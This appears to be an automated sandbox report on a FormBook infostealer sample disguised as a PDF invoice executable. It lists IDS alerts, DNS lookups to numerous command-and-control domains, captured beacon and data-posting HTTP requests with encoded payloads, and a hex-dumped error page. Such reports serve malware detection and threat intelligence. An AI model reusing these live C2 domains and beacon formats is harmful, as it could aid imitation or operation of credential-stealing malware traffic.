Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 104.21.4.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 66.29.137.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 172.67.162.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 172.67.162.12:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50051 -> 104.21.4.93:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50047 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 104.21.4.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 66.29.137.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 172.67.162.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 66.29.137.10:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50043 -> 172.67.162.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50046 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 172.67.162.12:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 66.29.137.10:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50050 -> 104.21.4.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 172.67.162.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.155.76.124:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 43.155.76.124:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 13.248.169.48:80
                Source: DNS query: www.aziziyeescortg.xyz
                Source: DNS query: www.aiactor.xyz
                Source: DNS query: www.optimismbank.xyz
                Source: Joe Sandbox View IP Address: 13.248.169.48
                Source: Joe Sandbox View IP Address: 103.224.182.242
                Source: Joe Sandbox View ASN Name: AMAZON-02US
                Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP
                Source: Joe Sandbox View ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
                Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00974EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00974EB5
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                    date: Wed, 20 Nov 2024 07:34:08 GMT
                    server: Apache
                    set-cookie: __tad=1732088048.1405750; expires=Sat, 18-Nov-2034 07:34:08 GMT; Max-Age=315360000
                    vary: Accept-Encoding
                    content-encoding: gzip
                    content-length: 576
                    content-type: text/html; charset=UTF-8
                    connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                    date: Wed, 20 Nov 2024 07:34:10 GMT
                    server: Apache
                    set-cookie: __tad=1732088050.5135837; expires=Sat, 18-Nov-2034 07:34:10 GMT; Max-Age=315360000
                    vary: Accept-Encoding
                    content-encoding: gzip
                    content-length: 576
                    content-type: text/html; charset=UTF-8
                    connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                    date: Wed, 20 Nov 2024 07:34:13 GMT
                    server: Apache
                    set-cookie: __tad=1732088053.2947419; expires=Sat, 18-Nov-2034 07:34:13 GMT; Max-Age=315360000
                    vary: Accept-Encoding
                    content-encoding: gzip
                    content-length: 576
                    content-type: text/html; charset=UTF-8
                    connection: close
                Source: global traffic HTTP traffic detected: GET /wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= HTTP/1.1
                    Host: www.aziziyeescortg.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.grandesofertas.fun
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= HTTP/1.1
                    Host: www.sankan-fukushi.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /m7wz/?GR54yHZ8=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhLYFcCcGdRxpuCJbxh795ns7rh5kB8bzkZsIh+aAnGmWaZAVFBY=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.conansog.shop
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /80gy/?9xn=fHadNpk8MVax&GR54yHZ8=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sMbIBlgbQh0ui0+zZIwlVcUsfMWllXpvy1Ukuj6D4Ic/01nyaOg= HTTP/1.1
                    Host: www.beythome.online
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.tempatmudisini06.click
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= HTTP/1.1
                    Host: www.questmatch.pro
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.callyur.shop
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= HTTP/1.1
                    Host: www.housew.website
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.nuy25c9t.sbs
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.madhf.tech
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.a1shop.shop
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.aiactor.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.sitioseguro.blog
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /lnyv/?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.optimismbank.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic HTTP traffic detected: GET /ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax HTTP/1.1
                    Host: www.nonpressure.beauty
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global traffic DNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: global traffic DNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global traffic DNS traffic detected: DNS query: www.sankan-fukushi.info
                Source: global traffic DNS traffic detected: DNS query: www.conansog.shop
                Source: global traffic DNS traffic detected: DNS query: www.beythome.online
                Source: global traffic DNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global traffic DNS traffic detected: DNS query: www.questmatch.pro
                Source: global traffic DNS traffic detected: DNS query: www.callyur.shop
                Source: global traffic DNS traffic detected: DNS query: www.housew.website
                Source: global traffic DNS traffic detected: DNS query: www.nuy25c9t.sbs
                Source: global traffic DNS traffic detected: DNS query: www.madhf.tech
                Source: global traffic DNS traffic detected: DNS query: www.a1shop.shop
                Source: global traffic DNS traffic detected: DNS query: www.aiactor.xyz
                Source: global traffic DNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global traffic DNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global traffic DNS traffic detected: DNS query: www.nonpressure.beauty
                Source: unknown HTTP traffic detected: POST /5rfk/ HTTP/1.1
                    Host: www.grandesofertas.fun
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate, br
                    Connection: close
                    Content-Length: 213
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: max-age=0
                    Origin: http://www.grandesofertas.fun
                    Referer: http://www.grandesofertas.fun/5rfk/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                    Data Ascii: GR54yHZ8=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKE1xDUCM37EKV0a6herUHW5w4Tp2ysDkRJAuaM3xtBGF
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 20 Nov 2024 07:31:49 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1Yjc7qorQkIAKyPansiI5oqvUUETMy1uuq4ctnrDLXcEOcc2xNUxD0SYuCrqvz2Sp2MLN87KyiJYVwhTPeZ7RbXy7NDIbj5DCJSx45sg%2BUMXayoAC3rxjtgA2%2Fntdc3%2BhxwwSlqixg"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8e56be1a4d79c44f-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1453&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 20 Nov 2024 07:32:19 GMT
                    Content-Type: text/html
                    Content-Length: 19268
                    Connection: close
                    Server: Apache
                    Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                    Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 20 Nov 2024 07:32:21 GMT
                    Content-Type: text/html
                    Content-Length: 19268
                    Connection: close
                    Server: Apache
                    Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                    Accept-Ranges: bytes
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:24 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 
20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
